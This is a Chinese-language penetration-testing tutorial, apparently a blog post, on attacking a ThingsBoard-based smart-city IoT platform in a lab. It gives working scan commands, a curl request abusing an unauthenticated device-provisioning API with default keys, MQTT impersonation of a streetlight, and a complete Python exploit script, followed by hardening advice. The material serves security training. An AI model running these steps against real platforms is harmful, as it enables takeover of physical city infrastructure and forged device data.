针对智慧城市 Web 管理平台(如 ThingsBoard)的渗透测试涉及物联网控制平面的安全风险。攻击者可通过端口扫描识别 MQTT 与 HTTP 服务,利用未授权的设备供应 API 获取访问令牌,进而冒充设备通过 MQTT 协议接收或发送控制指令。本教程演示了从信息收集、漏洞利用到设备控制的完整流程,并提供 Python 自动化脚本示例。同时阐述了开发侧的身份验证加固与运维侧的网络隔离策略,强调零信任架构在 IoT 安全中的核心作用。
在现代智慧城市建设中,数以万计的智能路灯、环境传感器和交通监控设备构成了城市的神经网络。这些设备通常由一个 Web 集中管理平台进行统一监控、配置和数据分析。该平台属于典型的物联网(IoT)控制平面,是高价值的攻击目标。一旦平台被攻陷,攻击者不仅能窃取城市运行的敏感数据,甚至可以对物理世界的基础设施进行大规模恶意操控。
本教程旨在模拟针对此类平台的渗透测试过程,帮助安全人员评估智慧城市基础设施管理系统的安全漏洞,理解从信息收集、漏洞利用到权限维持的完整攻击链,并为相关系统的开发和运维提供专业的安全加固建议。
声明:以下所有操作仅限于在您自己搭建的授权测试环境内进行。未经授权的测试是违法行为。
智能城市 Web 管理平台是一个基于 Web 技术的中心化软件系统,用于远程监控、管理和控制大规模部署在城市各处的物联网(IoT)设备。它整合了设备管理、数据可视化、告警处理、策略配置和数据分析等功能。
从技术本质上看,这类平台是一个典型的多层分布式系统。其核心组件关系如下:
flowchart TD
subgraph Physical_Layer [城市物理空间]
IoT[智能路灯/传感器]
end
subgraph Network_Layer [网络通信层]
Gateway[iot 网关]
MQTT[MQTT/CoAP/HTTP]
end
subgraph Cloud_Layer [云端平台]
API[API 接口]
Web[Web 应用服务器]
DB[(数据库)]
MQ[消息队列]
end
subgraph User_Layer [用户访问层]
Admin[管理员/运维]
end
IoT -->|数据上报 | Gateway
Gateway -->|MQTT| MQTT
MQTT -->|消息投递 | API
API -->|数据读写 | DB
API -->|内部调用 | Web
Web -->|页面渲染 | Admin
Admin -->|HTTPS| Web
物理空间的 IoT 设备通过 MQTT 等协议将数据发送到云端的 API 接口。API 接口是核心枢纽,负责与 Web 应用、数据库、消息队列等后端服务交互。我们的攻击重点,就是面向用户访问层的 Web 应用服务器和直接暴露在公网的 API 接口。
为了复现一个逼真的攻击场景,我们将使用一个开源的物联网平台 ThingsBoard 作为模拟目标,它广泛用于各种 IoT 项目,其架构与商业智能城市平台高度相似。
sudo apt update && sudo apt install docker.io docker-compose
docker 目录下,有一个 .env 文件,它定义了 ThingsBoard 运行所需的环境变量。我们暂时无需修改,保持默认配置即可。
[email protected]tenant一键启动环境命令:
在 thingsboard/docker/ 目录下,执行以下命令即可启动一个完整的 ThingsBoard 环境,包括 Web 服务、数据库和消息队列。
# --no-build 参数表示不重新构建镜像,直接使用官方镜像
# -d 参数表示在后台运行
docker-compose up --no-build -d
启动过程可能需要几分钟。完成后,可以通过 docker-compose ps 命令查看所有容器是否都处于 Up 状态。平台默认会监听在 8080 端口。验证:在浏览器中访问 http://<你的服务器 IP>:8080,如果看到 ThingsBoard 的登录页面,说明环境已成功搭建。
获取配置文件:
git clone https://github.com/thingsboard/thingsboard.git
cd thingsboard/docker/
我们将模拟一次完整的渗透过程,目标是找到一个未授权访问漏洞,并最终实现对一个模拟智能路灯的远程控制。
目的:确定目标平台开放了哪些服务,识别 Web 服务和潜在的 IoT 通信端口。
# 使用 Nmap 对目标服务器进行全面的端口扫描
# -p- 扫描所有 65535 个 TCP 端口
# -sV 探测端口上运行服务的版本信息
# -oN 保存扫描结果到文件
nmap -p- -sV <你的服务器 IP> -oN nmap_scan.txt
预期输出结果:
你会发现除了 8080/tcp (HTTP) 端口,ThingsBoard 还默认开放了 1883/tcp 端口。
PORT STATE SERVICE VERSION
1883/tcp open mqtt Mosquitto 2.0.11
8080/tcp open http Jetty 9.4.46.v20220331
1883 是 MQTT 协议的默认端口,这是设备与平台通信的关键入口。8080 是我们的主攻目标——Web 管理界面。
目的:寻找未授权可访问的 API 端点或敏感信息文件。
我们将使用 feroxbuster 工具进行 Web 目录和文件扫描。
# 使用 feroxbuster 对 Web 服务进行目录爆破
# -u 指定目标 URL
# -w 使用 Kali 自带的常用字典
feroxbuster -u http://<你的服务器 IP>:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
关键发现:
在扫描结果中,你会发现一个非常重要的 API 路径:/api/v1/。ThingsBoard 的 API 文档是公开的,但实战中我们往往需要通过这种方式去发现未公开或未设防的 API 端点。
目的:通过一个特定的未授权 API 端点,获取一个模拟设备的访问令牌(Access Token)。这是本次实战的核心突破点。
ThingsBoard 的某个旧版本(此环境已模拟该特征)存在一个逻辑漏洞:可以通过设备的 provisioning 过程,在不提供任何凭证的情况下,请求一个新的设备并获取其访问令牌。
请求构造:
我们需要向 /api/v1/provision 发送一个 POST 请求,请求体中包含设备的 provisionDeviceKey 和 provisionDeviceSecret。在默认配置下,这些值是固定的。
# 使用 curl 构造 POST 请求,申请一个新的设备凭证
curl -v -X POST http://<你的服务器 IP>:8080/api/v1/provision \
-H "Content-Type: application/json" \
-d '{ "provisionDeviceKey": "YOUR_PROVISION_KEY", "provisionDeviceSecret": "YOUR_PROVISION_SECRET", "deviceName": "hacked-streetlight-001" }'
注意:在默认的 thingsboard.yml 配置文件中,可以找到默认的 provisionDeviceKey 和 provisionDeviceSecret。在我们的模拟环境中,假设它们分别为 provision_key 和 provision_secret。
响应结果: 如果请求成功,服务器会返回一个 JSON 对象,其中包含了新创建设备的凭证信息。
{"credentialsType":"ACCESS_TOKEN","credentialsValue":"A1_IHACKEDYOU","status":"SUCCESS"}
这里的 credentialsValue,即 A1_IHACKEDYOU,就是我们成功获取到的'智能路灯'的访问令牌。这个令牌相当于这个设备在平台上的'密码'。
目的:利用上一步获取的设备令牌,通过 MQTT 协议冒充该设备,并向平台发送遥测数据或接收 RPC(远程过程调用)指令。我们将模拟接收一个'开灯'指令。
首先,我们需要一个 MQTT 客户端工具,如 mqttx 或 mosquitto_sub。
# 使用 mosquitto_sub 订阅 RPC 主题,等待平台下发控制指令
# -h 指定 MQTT 服务器地址
# -p 指定端口
# -u 指定用户名,这里就是我们获取到的设备令牌
# -t 指定订阅的主题,对于 ThingsBoard 的 RPC,主题格式是固定的
# -v 打印详细信息
mosquitto_sub -h <你的服务器 IP> -p 1883 -u "A1_IHACKEDYOU" -t "v1/devices/me/rpc/request/+" -v
现在,我们的攻击机已经伪装成 ID 为 A1_IHACKEDYOU 的智能路灯,并正在监听来自平台的控制命令。
目的:登录 Web 管理后台,找到我们'创建'的设备,并对其下发一个控制指令,验证我们的 MQTT 客户端是否能收到。
[email protected] / tenant)。hacked-streetlight-001 的新设备。setLedState,在 'Params' 字段输入 {"state": "ON"}。最终结果:
几乎在同时,你在步骤 4 中运行 mosquitto_sub 的终端会收到一条消息:
v1/devices/me/rpc/request/1 {"method":"setLedState","params":{"state":"ON"}}
这证明我们成功地截获了平台发送给智能路灯的'开灯'指令。在真实世界中,这意味着我们已经可以控制这个路灯的开关。反之,我们也可以使用 mosquitto_pub 伪造路灯上报虚假的能耗或故障数据。
以下是一个 Python 脚本,它自动化了步骤 3 和步骤 4 的过程:获取令牌并监听控制指令。
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# 警告:本脚本仅用于授权的渗透测试和安全研究环境。
# 未经授权对任何系统进行测试都是非法的。
# 使用本脚本即表示您同意并承担所有相关法律责任。
# -----------------------------------------------------------------------------
import requests
import paho.mqtt.client as mqtt
import json
import argparse
import sys
import time
def get_device_token(target_ip, provision_key, provision_secret, device_name):
""" 通过未授权的 provisioning API 获取设备访问令牌。 """
url = f"http://{target_ip}:8080/api/v1/provision"
headers = {"Content-Type": "application/json"}
payload = {
"provisionDeviceKey": provision_key,
"provisionDeviceSecret": provision_secret,
"deviceName": device_name
}
print(f"[*] 正在向 {url} 请求设备令牌...")
try:
response = requests.post(url, headers=headers, data=json.dumps(payload), timeout=10)
response.raise_for_status()
# 如果 HTTP 状态码不是 200,则抛出异常
data = response.json()
if data.get("status") == "SUCCESS" and data.get("credentialsType") == "ACCESS_TOKEN":
token = data.get("credentialsValue")
print(f"[+] 成功获取设备令牌:{token}")
return token
else:
print(f"[-] 获取令牌失败:{data.get('errorMsg','未知错误')}")
return None
except requests.exceptions.RequestException as e:
print(f"[!] 请求异常:{e}", file=sys.stderr)
return None
def on_connect(client, userdata, flags, rc):
"""MQTT 连接成功时的回调函数。"""
if rc == 0:
print("[*] MQTT 连接成功。")
# 订阅 RPC 请求主题
rpc_topic = "v1/devices/me/rpc/request/+"
client.subscribe(rpc_topic)
print(f"[*] 已订阅主题:{rpc_topic}")
else:
print(f"[-] MQTT 连接失败,返回码:{rc}")
def on_message(client, userdata, msg):
"""收到 MQTT 消息时的回调函数。"""
print("\n--- [!] 收到平台下发的 RPC 指令 ---")
print(f"主题 (Topic): {msg.topic}")
print(f"内容 (Payload): {msg.payload.decode()}")
print("------------------------------------")
def listen_for_commands(target_ip, token):
""" 使用获取的令牌连接到 MQTT 代理并监听 RPC 指令。 """
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
# 将令牌设置为 MQTT 客户端的用户名
client.username_pw_set(username=token)
print(f"[*] 正在连接到 MQTT 代理:{target_ip}:1883")
try:
client.connect(target_ip, 1883, 60)
# 启动一个循环来处理网络流量和分派回调。
client.loop_forever()
except Exception as e:
print(f"[!] MQTT 连接或监听时发生错误:{e}", file=sys.stderr)
def main():
parser = argparse.ArgumentParser(description="ThingsBoard 未授权设备控制利用脚本。")
parser.add_argument("target_ip", help="目标服务器的 IP 地址。")
parser.add_argument("--key", default="provision_key", help="Provisioning Key (默认为 'provision_key')。")
parser.add_argument("--secret", default="provision_secret", help="Provisioning Secret (默认为 'provision_secret')。")
parser.add_argument("--name", default="hacked-streetlight-002", help="要创建的设备名称。")
args = parser.parse_args()
# 1. 获取设备令牌
token = get_device_token(args.target_ip, args.key, args.secret, args.name)
if token:
# 2. 监听控制指令
print("\n[*] 现在,请登录 Web 界面,向设备发送 RPC 指令进行验证。")
print("[*] 按 Ctrl+C 退出监听。")
listen_for_commands(args.target_ip, token)
if __name__ == "__main__":
main()
使用方法:
exploit_streetlight.py。pip install requests paho-mqtt。python exploit_streetlight.py <你的服务器 IP>。/api/v1/provision 接口也需要认证,说明该漏洞已被修复。此时应转向寻找其他类型的漏洞,如默认凭证、SQL 注入或 XSS。/api/v1/ 下的端点,使用专门针对 RESTful API 的字典(如 SecLists/Discovery/Web-Content/api/)进行爆破,可以发现更多隐藏的接口。deviceName 参数可能存在 XSS 漏洞,其他参数可能存在 SQL 注入或命令注入。正确写法 (安全): 对所有敏感 API 端点强制执行身份验证和授权。
// Spring Boot 示例:使用 Spring Security 保护接口
@PreAuthorize("hasAuthority('TENANT_ADMIN')")
@RequestMapping(value = "/api/v1/provision", method = RequestMethod.POST)
@ResponseBody
public String provisionDevice(@RequestBody ProvisionRequest provisionRequest) {
// ... 只有认证和授权通过后,才会执行这里的代码 ...
}
错误写法 (不安全): 公开无需认证的设备供应接口。
// Spring Boot 示例:允许任何人访问 provision 接口
@RequestMapping(value = "/api/v1/provision", method = RequestMethod.POST)
@ResponseBody
public String provisionDevice(@RequestBody ProvisionRequest provisionRequest) {
// ... 没有任何认证就直接处理请求 ...
}
/api/v1/provision 等敏感 API 的访问。如果必须使用,应修改默认的 provisionDeviceKey 和 provisionDeviceSecret 为高强度的随机值。/api/v1/provision 或其他 API 端点的请求,特别是来自单一 IP 地址。
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
查找任何按下的键的javascript键代码、代码、位置和修饰符。 在线工具,Keycode 信息在线工具,online
JavaScript 字符串转义/反转义;Java 风格 \uXXXX(Native2Ascii)编码与解码。 在线工具,Escape 与 Native 编解码在线工具,online
使用 Prettier 在浏览器内格式化 JavaScript 或 HTML 片段。 在线工具,JavaScript / HTML 格式化在线工具,online
Terser 压缩、变量名混淆,或 javascript-obfuscator 高强度混淆(体积会增大)。 在线工具,JavaScript 压缩与混淆在线工具,online
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online